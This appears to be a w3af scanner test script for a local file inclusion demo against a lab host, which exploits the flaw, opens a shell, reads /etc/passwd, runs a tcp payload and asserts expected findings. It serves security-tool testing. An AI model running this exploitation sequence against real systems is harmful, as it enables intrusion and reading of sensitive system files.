# This is the local file inclusion demo:

plugins
audit os_commanding, lfi
discovery web_spider
discovery config web_spider
set onlyForward True
back
grep path_disclosure

output console,text_file
output config text_file
set fileName output-w3af.txt
set verbose True
back
back

target
set target http://moth/w3af/audit/local_file_inclusion/trivial_lfi.php?file=index.html
back

start

exploit
exploit local_file_reader

interact 0

read /etc/passwd
payload tcp

list

exit
back

assert len(kb.kb.getData('lfi','lfi')) == 3
assert len(kb.kb.getData('local_file_reader','shell')) == 1
assert len(kb.kb.getData('path_disclosure','listFiles')) > 2

exit
